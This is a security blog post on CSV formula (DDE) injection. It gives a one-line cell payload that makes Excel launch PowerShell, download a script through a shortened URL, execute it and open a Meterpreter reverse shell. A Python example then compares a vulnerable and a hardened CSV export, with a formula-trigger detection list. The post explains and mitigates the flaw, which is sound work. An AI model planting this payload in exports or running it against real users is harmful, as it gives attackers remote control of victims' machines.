As many of you have probably seen, last year Context published research into spreadsheet applications such as Excel which evaluate any formulae embedded in a CSV file when it is opened. If you haven't, I suggest stopping and reading http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
Many web applications give users an option to export data to CSV, and when any of that data can be influenced by an attacker (registration names, analytics data, etc.), the two together are a potentially dangerous combination.
To highlight the risk of such a vulnerability, sometimes popping calc.exe isn’t enough, and nothing quantifies risk quite like a meterpreter shell ;)
With that in mind, I created a quick PoC which leverages PowerShell and PowerSploit to spawn a Meterpreter reverse connection back to an attacker-controlled host:
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
This was kept as small as possible (because of the length limits on many of the CSV fields I have tested in the past) and relies on the 'wget' alias for Invoke-WebRequest (and 'IEX' for Invoke-Expression), so the victim needs PowerShell 3.0 or later for it to work.
The cell is a DDE request: Excel asks CMD.EXE to run the PowerShell one-liner, which downloads and executes a copy of invoke-shellcode.ps1 (from PowerSploit) that, when called, attempts a Meterpreter reverse connection to meterpreter.local on port 443. Bear in mind that Excel shows a warning before starting the external application, so the target still has to click through it; with that done, it is perfect for a demo to show off your CSV pwning skills.
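The other side of this is the export code that lets the payload through in the first place. The following is an added example (not part of the original post or of PowerSploit) of a naive CSV export next to a hardened one. The user records, field names and the 'neutralise' helper are my own construction; the attacker-supplied name is the payload from this post. Wrapping fields in double quotes is not enough on its own, since Excel still evaluates a quoted cell that starts with '=', so the hardened version also prefixes dangerous cells with a single quote, which Excel then treats as text (the apostrophe remains visible in the data, which is the usual trade-off of this mitigation).

```python
import csv
import io

# Constructed sample data: row 2 carries the DDE payload from this post as a
# "registration name"; row 3 shows a legitimate value that also starts with a
# formula trigger ('+') and will be neutralised as collateral damage.
USERS = [
    {"id": 1, "name": "Alice Example", "email": "alice@example.test"},
    {"id": 2, "name": "=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0",
     "email": "mallory@example.test"},
    {"id": 3, "name": "+44 7700 900123", "email": "bob@example.test"},
]
FIELDS = ["id", "name", "email"]

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
# Tab, CR and LF are included because a field that starts with one of them can
# smuggle a formula start past filters that only look at the first byte.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def is_formula_injection(value):
    """True if a spreadsheet would evaluate this cell rather than display it.

    Leading spaces are stripped first as a conservative assumption: we do not
    rely on whitespace to protect the cell.
    """
    return isinstance(value, str) and value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralise(value):
    """Prefix a dangerous cell with a single quote so it is shown as text."""
    if is_formula_injection(value):
        return "'" + value
    return value


def export_csv(rows, fieldnames, hardened=True):
    """Render rows as CSV. hardened=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        out = {k: (neutralise(v) if hardened else v) for k, v in row.items()}
        writer.writerow(out)
    return buf.getvalue()


if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_csv(USERS, FIELDS, hardened=False))
    print("--- hardened export ---")
    print(export_csv(USERS, FIELDS))
```

Run it and compare the two outputs: in the vulnerable export the 'name' cell for row 2 is exactly the DDE payload, quoted but still evaluated by Excel; in the hardened export it becomes "'=cmd|..." and is displayed as a string. Row 3's phone number also gains an apostrophe, so if your export contains legitimate values beginning with '+' or '-', decide up front whether that is acceptable or whether those columns need a different treatment.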